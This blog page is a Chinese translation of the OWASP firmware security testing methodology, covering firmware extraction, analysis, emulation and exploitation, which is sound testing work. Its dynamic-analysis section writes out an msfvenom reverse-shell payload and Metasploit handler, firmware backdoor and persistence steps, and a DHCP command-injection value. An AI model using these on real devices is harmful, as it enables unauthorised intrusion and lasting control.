当前位置:   article > 正文

OWASP固件安全性测试指南_fstm

fstm

原文地址
固件安全评估,英文名称firmware security testing methodology简称FSTM。该指导方法主要是为了安全研究人员、软件开发人员、顾问、爱好者和信息安全专业人员进行固件安全评估。
fstm_cover

前景

我们基于FSTM进行测试流程如下:

ID阶段描述
1信息收集固件的相关技术文档的详细使用说明
2获取固件使用本文中介绍的多种办法获取固件
3分析固件固件的功能、特性
4提取文件系统从固件中获取文件系统
5分析文件系统内容静态分析提取的文件系统的配置文件和二进制文件中的漏洞
6仿真固件模拟固件文件和组件
7动态分析根据固件和应用程序接口进行动态测试
8运行时分析在设备运行时分析编译的二进制文件
9二进制利用利用上述手段发现的漏洞实现命令执行

0x01 信息收集

可搜集与固件相关如下基础信息:

  • 基于的CPU架构
  • 操作系统平台
  • 引导程序配置
  • 硬件原理图
  • 数据表
  • 代码行估计
  • 源代码存储库位置
  • 第三方组建
  • 开源许可证(GPL)
  • 变更日志
  • FCC ID
  • 设计和数据流程图
  • 威胁建模
  • 渗透测试报告之类
  • 一些测试平台的测试(Jira、错误赏金平台bugcrowd或hackerone )

搜集方法:

  • 利用开发团队及其内部产品线获取准确和最新的数据,及其项目设计原理和应用的安全设置,进而判断出与安全风险有关的信息和某些特定功能点。
  • 开源情报(OSINT:Open source intelligence)技术手段来获取数据

在搜集信息中遇到开源软件的处理方式:

  • 下载开源软件存储库,并根据代码库执行手动和自动静态分析
  • 开源软件有其自身的静态分析工具,Example:
U-Boot Coverity Scan

4

U-Boot Coverity Scan Analysis
  • semmle的LGTM对Dropbear的分析:
    5
LGTM Dropbear Alerts

6

LGTM Dropbear Results

获取如上信息后便可进行粗略的威胁建模:标识出可攻击功能点和影响范围,方便测试时进行漏洞点的贯穿使用。

0x02 获取固件

  • 直接从开发团队、制造商/供应商或用户获取
  • 使用制造商提供的项目从头编译
  • 从供应商的support网站获取
  • 从共享平台(DropboxboxGoogle drive)根据二进制文件扩展名获取
    • 从用户为了解决问题而上传固件到论坛、博客,或官方评论中获取
  • 设备更新进行中间人(MITM)获取
  • 云提供商存储位置(如:AWS,全称Amazon Web Services S3 buckets)下载构建版本
  • 通过UARTJTAGPICit等直接从硬件中提取
  • 嗅探"硬件组件中的串行通信"中的更新服务器请求
  • 通过移动应用程序中的硬编码接口
  • 将固件从引导加载程序(如:U-boot)转储到闪存或通过tftp的网络转储
  • 从主板卸下闪存芯片(如:SPI)或MCU,以进行离线分析和数据提取
  • 需要相应的芯片编辑器来存储flash/MCU

0x03 分析固件

获取固件后需要分析其特征信息:固件文件类型、潜在的根文件元数据、编译基于的平台,使用binutils分析过程如下:

file <bin>  
strings  
strings -n5 <bin>  
binwalk <bin>  
hexdump -C -n 512 <bin> > hexdump.out  
hexdump -C <bin> | head # might find signatures in header
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

若使用上述方法未提取出有用信息,可能由于以下原因:

  • 二进制文件可能是Bare Metal
  • 二进制文件可能仅适用于带有自定义文件系统的实时操作系统(RTOS)平台
  • 二进制文件可能是加密的

判断二进制文件是否是加密:

  • 通过命令:binwalk -E <bin> ,判断其熵
    • 低熵:不太可能被加密
    • 高熵:可能被加密(或以某种方式压缩)
  • 也可以使用其他程序或在线程序(如:binvis
    • https://code.google.com/archive/p/binvis/
    • https://binvis.io/#/

0x04 提取文件系统

  • 固件:一个二进制文件的压缩包,文件系统是其中的一个组件,存储在二进制文件的特定偏移地址中,且有一定大小。
  • 文件系统类型:squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs

为了分析固件内部相关文件系统数据、未编译代码和设备配置,需使用以下手动和自动方法提取固件文件系统:

  • 偏移量和文件系统大小信息获取:
    • 使用hexdumpgrep等工具搜索特征信息
      • 判断文件系统开始位置,如:Squashfs文件系统
        • 通过hexdump查找"hsqs"字符串,hexdump -C binary | grep -i 'hsqs'
      • 使用dd命令将从该地址开始到文件末尾的内容全部转储下来
        • dd if=binary bs=1 skip=92588 of=rt-n300-fs
      • 通过如上步骤,从二进制文件中获取到文件系统,使用unsquashfs查看整个文件系统
  • binwalk
    • binwalk -ev <bin>,提取出的文件保存:_binaryname/filesystemtype/

    • 若是文件的标头没有魔术字节 ,需使用binwalk查找文件系统的偏移量,然后从二进制文件中分割压缩的文件系统,最后再手动提取出来。

      • 分割
      dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs # or
      dd if=DIR850L_REVB.bin bs=1 skip=$((0x1A0094)) of=dir.squashfs
      
      • 1
      • 2
      • 提取
      For squashfs:
              unsquashfs dir.squashfs
      CPIO archive files:
              cpio -ivd --no-absolute-filenames -F <bin>
      For jffs2 filesystems:
              jefferson rootfsfile.jffs2
      For ubifs filesystems with NAND flash:
              ubireader_extract_images -u UBI -s <start_offset> <bin>、ubidump.py <bin>
      
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8

0x05 分析文件系统内容

手动分析

静态分析文件系统可从如下方面入手:

  • 不安全网络守护程序,如:telnetd(有时会伪装成重命名二进制文件)
  • 硬编码凭证(用户名、密码、API密钥、SSH密钥和后门变体)
  • 硬编码的API端点和后端服务器详细信息
  • 更新可用作入口点的服务器功能
  • 查看未编译的代码并启动脚本以执行远程代码
  • 提取已编译的二进制文件,使用反汇编程序脱机分析
  • 同时,此过程中分析的结果,可为动态分析做基础准备。

自动分析:firmwalker

firmwalker分析内容范围如下:

  • etc/shadow and etc/passwd
  • etc/ssl
  • 与ssl相关的文件,如:.pem .crt等
  • 搜索配置文件
  • 寻找脚本文件
  • 搜索其他.bin 文件
  • 查找admin、password、remote、AWS key等关键字
  • 搜索物联网设备上使用的通用Web服务器
  • 搜索常见的二进制文件,如:ssh、tftp、dropbear 等
  • 搜索禁止的C函数
  • 搜索常见的易受命令注入攻击的功能
  • 搜索URL、电子邮件、IP地址

自动固件分析工具:firmwalkerAaron Guzman在原生代码基础上添加了一些其他的检查,可参照firmwalker

案例:在OWASP IOTGoat中使用firewalker分析

firmwalk分析文件系统需使用绝对路径:

./firmwalker.sh /home/embedos/firmware/_IoTGoat-rpi-2.img.extracted/squashfs-root/
  • 1

分析结果如下:
7

分析结果存储在/data/目录下的两个文件:firmwalker.txtfirmwalkerappsec.txt,需手动检查这些文件。

自动分析:FACT

FACT固件分析比较工具包分析内容如下:

  • 标识软件组件(如:操作系统、CPU体系结构和第三方组件)及其关联的版本信息
  • 从映像中提取固件文件系统
  • 检测证书和私钥
  • 检测CWE
  • 基于提要和签名的漏洞检测
  • 基于静态行为分析
  • 固件版本和文件的比较(差异)
  • 使用QEMU对文件系统中的二进制文件进行用户仿真
  • 缓冲区溢出防护机制NX, DEP, ASLR, stack canaries, RELRO, FORTIFY_SOURCE
  • REST API

案例:在EmbedOS中使用FACT分析

cd ~/tools/FACT_core
sudo ./start_all_installed_fact_components
  • 1
  • 2

浏览器访问:http://127.0.0.1:5000,
8

FACT Dashboard

将固件上传到FACT进行分析(可以将带有文件系统的完整固件)
10

FACT Upload

根据给FACT硬件资源,扫描时间会相应不同
10 (1)

FACT IoTGoat

FACT分析结果
11

FACT IoTGoat Exploit Mitigation Results

二进制文件分析

  • 可使用工具:IDA ProGhidra、HopperCapstonebinary Ninja进行分析。
    • 使用Ghidra对二进制文件"shellback"的分析如下:
      12
Shellback Ghidra Analysis
  • 二进制文件选取及分析内容:可以选择从FACT获取的可疑内容,或针对漏洞利用点进行查找分析,如:

    • 系统调用、字符串、函数列表、易产生内存损坏,对system()或类似函数调用等。
  • 分析二进制文件的常见功能点

    • 是否启用Stack canaries(堆栈保护机制)
    readelf -aW bin/*| grep stack_chk_fail
    mips-buildroot-linux-uclibc-objdump -d bin/binary | grep stack_chk_fail
    
    • 1
    • 2
    • 是否启用Position-independent executable(PIE)地址无关可执行文件

      • PIE disabled
      readelf -h <bin> | grep -q 'Type:[[:space:]]*EXEC'
      
      • 1
      • PIE enabled
      readelf -h <bin> | grep 'Type:[[:space:]]*DYN'
      
      • 1
    • DSO(dynamic shared object)动态共享目标文件

    readelf -d <bin> | grep -q 'DEBUG'
    
    • 1
    • Symbols 动态链接库和符号
    readelf --syms <bin>
    nm <bin>
    
    • 1
    • 2
    • 可识别的字符串
      • -el指定16位宽的小端字符(如:UTF-16)
      • -eb使用大端
      • 将任何大于16的ASCII字符串打印到stdout
      • -t将返回文件中字符串的偏移量
      • -tx以十六进制格式返回,-td以八进制和十进制表示T-to
      • 与十六进制编辑器进行交叉引用,或字符串在文件中的位置
    • 是否启用Non-executable (NX)(应该是一种数据保护 DEP)
    readelf -lW bin/<bin>| grep STACK判断堆栈是否可执行,E 代表可执行:GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
    
    • 1

    判断堆栈是否可执行,E代表可执行:GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4

    execstack bin/*
    bin/ash
    bin/busybox
    
    • 1
    • 2
    • 3
    • RELRO(RELocation Read-Only,只读重定位)(一种用于加强对二进制数据段的保护技术)配置

      • 完整 RELRO
      readelf -d binary | grep BIND_NOW
      
      • 1
      • 部分 RELRO
      readelf -d binary | grep GNU_RELRO
      
      • 1
  • 自动检查上述二进制属性的脚本checksec.sh,如下示例:

./checksec --file=/home/embedos/firmware/_IoTGoat-x86-generic-combined-squashfs.img.extracted/squashfs-root/bin/busybox

./checksec --file=/home/embedos/firmware/_IoTGoat-x86-generic-combined-squashfs.img.extracted/squashfs-root/usr/bin/shellback
  • 1
  • 2
  • 3

13
对于Microsoft二进制文件(EXE、DLL),使用PESecurity检查ASLR,DEP,SafeSEH,StrongNaming,Authenticode,Control Flow GuardHighEntropyVA

0x06 仿真固件

为了确定及验证上面的详细信息、线索、潜在的漏洞,必需模拟固件及其封装的二进制文件。

如下列出仿真固件的方法:

  • 部分仿真(user mode)— 仿真从固件提取的文件系统中的二进制文件:/usr/bin/shellback
  • 完整的系统仿真—完整的固件仿真和利用伪造的NVRAM启动配置
  • 由于硬件或体系结构的依赖性,user modesystem mode可能无法仿真固件成功。在这种情况下,可以将根文件系统或特定二进制文件传输到与目标固件的架构和字节序匹配的物理设备中进行测试,除了物理设备外,也可以使用与目标固件相同体系结构或字节序的预构件虚拟机。

部分仿真(user mode)

  • 获取目标的CPU架构和字节序,然后选择适当的QEMU仿真二进制文件

    • CPU架构获取:
    binwalk -Y <bin> 
    readelf -h <bin>
    
    • 1
    • 2

    el代表:little endianeb代表:big endian

    • 字节序的获取:

      • 使用 binwalk 识别打包的固件二进制文件(不是提取出的文件系统中的二进制文件)
      binwalk -Y UPG_ipc8120p-w7-M20-hi3516c-20160328_165229.ov
      
      • 1
  • 确定了CPU的体系结构和字节序后,找适用的QEMU二进制文件来执行部分仿真(从文件系统中提取出的二进制文件)

    • QEMU 二进制文件通常所在目录:/usr/local/qemu-arch/usr/bin/qemu-arch
    • 将QEMU二进制文件复制到提取的文件系统的根目录中
    cd /home/embedos/firmware/_DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted.extracted/squashfs-root 
    cp /usr/bin/qemu-arm-static .
    
    • 1
    • 2
    • 执行 ARM 二进制文件(或其他的体系结构)使用 QEMU 和 chroot 进行仿真
    sudo chroot . ./qemu-arch <binarytoemulate>
    
    • 1

Example:

  • busybox
sudo chroot . ./qemu-arm-static bin/busybox ls
  • 1
  • shellback 开启5515上的侦听服务
sudo chroot . ./qemu-arm-static usr/bin/shellback
  • 1
  • 使用 netcat 尝试连接该服务
sudo lsof -i :5515
nc -nv 127.0.0.1 5515
  • 1
  • 2
  • MIPS CGI 二进制文件,向该文件发出POST请求
sudo chroot . ./qemu-mips-static -E REQUEST_METHOD="POST" -E REQUEST_URI=<request_uri> -E REMOTE_ADDR=<ip_addr> -E HTTP_COOKIE=<custom_cookie> -g <port> <path to cgi binary>
  • 1

通过上述手段模拟了目标二进制文件,可以使用其应用程序和网络接口,与其进行交互。

全系统仿真(system mode)

使用自动化工具来进行固件的完整仿真

自动化工具:firmadyne、固件分析工具包、ARM-X 固件仿真框架,这些工具实质上是 QEMU 和其他环境功能(如:nvram)的包装器。

需注意:固件中包含不常见的压缩文件系统或不支持的体系结构,可能需要修改这些工具

0x07 动态分析

设备在正常运行或者在仿真环境中运行中的动态测试,此阶段的测试可能会由于项目和访问级别有所差异。

分析手段:

  • 篡改引导程序配置
  • Web 和 API 测试
  • 模糊测试(网络和应用程序服务)
  • 使用各种工具集进行的主动扫描以获取提升的访问权限或代码执行
    • Burp Suite
    • OWASP ZAP
    • Commix
    • Fuzzers such as - American fuzzy loop (AFL)、
    • Network and protocol fuzzers such as - Mutiny, boofuzz, and kitty
    • Nmap
    • NCrack
    • Metasploit

嵌入式Web应用程序测试

检查方向

  • 诊断和故障排除页面可能存在命令注入
  • 验证和授权方案对整个固件中的应用程序和操作系统平台的相同框架进行验证
  • 默认的用户名、密码
  • 在网页执行目录遍历或文件读取,以识别调试或测试功能
  • 在SOAP/XML和API传输中的输入检查,如:XSS 和 XXE
  • 跟踪观察应用程序中的参数查看异常点和堆栈溢出点
  • 常见的C/C++漏洞、常见的嵌入式Web应用程序的有效负载,如:内存损坏漏洞、格式字符串缺陷、整数溢出

引导加载程序测试

修改设备的引导加载程序时,可以进行如下操作:

  • 在引导过程中加"0"、空格、或其他标识的“魔术代码”来获取shell
  • 修改配置以执行shell命令,如:引导参数末尾"init=/bin/sh"
#printenv
#setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3
mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 init=/bin/sh
#saveenv
#boot
  • 1
  • 2
  • 3
  • 4
  • 5
  • 设置一个tftp服务器,从本地通过网络加载远程图像(前提是设备有网络访问权限)
#setenv ipaddr 192.168.2.2 #local IP of the device
#setenv serverip 192.168.2.1 #tftp server IP
#saveenv
#reset
#ping 192.168.2.1 #check if network access is available
#tftp ${loadaddr} uImage-3.6.35 #loadaddr takes two arguments: the address to load the file into and the filename of the image on the TFTP server
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 使用ubootwrite.py编写uboot-image并且安装修改过的固件来获取root
  • 查看启用的调试功能,如:详细记录、加载任意内核、从不受信任的来源引导
  • 使用警告:使用引脚连接主板,观察设备启动顺序,在内核解压缩之前,将连接主板的引脚短路或者连接到SPI闪存芯片上的数据引脚(DO)
  • 使用警告:使用引脚连接主板,观察设备启动顺序,在内核解压缩之前,在U-boot对UBI映像解压缩时,将连接主板的引脚短路连接到NAND闪存芯片的引脚8和9
  • 在短接引脚之前请查看NAND闪存芯片的数据表
  • 使用恶意参数配置恶意DHCP服务器作为设备在PXE引导期间提取的输入
  • 使用Metasploit DHCP辅助服务器,进行命令注入,比如修改参数FILENAMEa";/bin/sh;#,来测试设备启动过程的输入验证

固件完整性测试

尝试上传自定义固件或编译过的二进制文件,来检测完整性或签名验证漏洞。

可设置后门点:启动脚本引用、某些链接、依赖不受信任的安装位置(如:SD 卡)或用位于根文件系统外部存储数据的flash的代码时触发。

使用以下步骤编译在启动中的后门 shell :

  1. 使用固件修改包(FMK:firmware-tool-kit)提取固件
  2. 确定目标固件架构和字节序
  3. 使用 Buildroot 构件交叉编译器或使用其他适合的环境
  4. 使用交叉编译器构件后门
  5. 将后门复制到解压缩的固件/usr/bin
  6. 将适当的QEMU二进制文件复制到固件rootfs
  7. 使用chroot和QEMU模拟后门
  8. 使用netcat连接后门
  9. 从rootfs中删除QEMU二进制文件
  10. 使用FMK重新包装修改后的固件
  11. 使用固件工具分析包(FAT)进行仿真并使用netcat连接到目标后门ip、端口测试后门固件

若在动态分析后,通过操纵引导加载程序或其他的硬件安全测试手段获得了root shell,尝试执行预编译恶意二进制文件(即在二进制文件中植入程序或反向shell),可通过使用自动化的有效载荷或工具(C&C)框架进行命令执行和控制,比如使用Metasploit框架和 msfvenom,如下是操作步骤:

  • 确定目标固件架构和字节序
  • 使用msfvenom生成有效载荷,-p :payload、攻击者ip:LHOST=、攻击者监听端口:LPORT=、有效载荷的文件类型:-f、结构体系:–arch、平台:–platform linux or windows、输出文件保存:-o
msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux
  • 1
  • 将有效载荷传输到受攻击的设备(操作举例:本地运行Web服务器,然后使用 wget/curl 上传到目标文件系统中),确认有效载荷有执行权限
  • 使用 Metasploit 接收反弹回的 shell 之前的设备
set payload linux/armle/meterpreter_reverse_tcp
set LHOST 192.168.1.245 #attacker host IP
set LPORT 445 #can be any unused port
set ExitOnSession false
exploit -j -z
  • 1
  • 2
  • 3
  • 4
  • 5
  • 在受攻击的设备中执行 meterpreter reverse
  • 查看 meterpreter sessions
  • 进行后渗透

最后,尽可能的在启动脚本中设置对设备持久访问的后门,保证重新启动后也有设备的访问控制权

0x08 运行时分析

设备在正常运行或在仿真环境中运行时,对正在运行的进程或二进制文件进行调试。如下是分析步骤:

  1. sudo chroot . ./qemu-arch -L <optionalLibPath> -g <gdb_port> <binary>
  2. 使用gdb-multiarch或IDA进行调试
  3. 为步骤4中的功能点设置断点,如:memcpy, strncpy, strcmp
  4. 确认漏洞点,比如:通过发送较大的有效载荷来识别溢出或进程崩溃点

一些可能使用的工具:

  • gdb-multiarch
  • Peda
  • Frida
  • ptrace
  • strace
  • IDA Pro
  • Ghidra
  • Binary Ninja
  • Hopper

0x09 漏洞利用

通过上面阶段的测试识别出漏洞之后,需使用PoC在真实环境中进行验证。编写漏洞利用代码需要掌握低级语言(如:ASM、C/C++、shellcode等)的编程及了解一些目标体系结构(如:MIPS、ARM、x86等)。

在遇到二进制缓解(保护)机制(eg:NX、DEP、ASLR等)时,需要其他技术进行恶意攻击,比如:

  • 面向返回的编程:ROP(Return-oriented Programming),ROP允许攻击者通过链接目标进程或二进制代码中现有的代码实施恶意攻击,利用ROP的漏洞举例:通过ROP链进行缓冲区溢出。可借助工具Capstone’s gadget finder或者ROPGadget

相关方面知识可参考文档:

  • https://azeria-labs.com/writing-arm-shellcode/
  • https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/

固件和二进制文件分析工具

用于练习的固件项目

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/654757
推荐阅读
相关标签
  

闽ICP备14008679号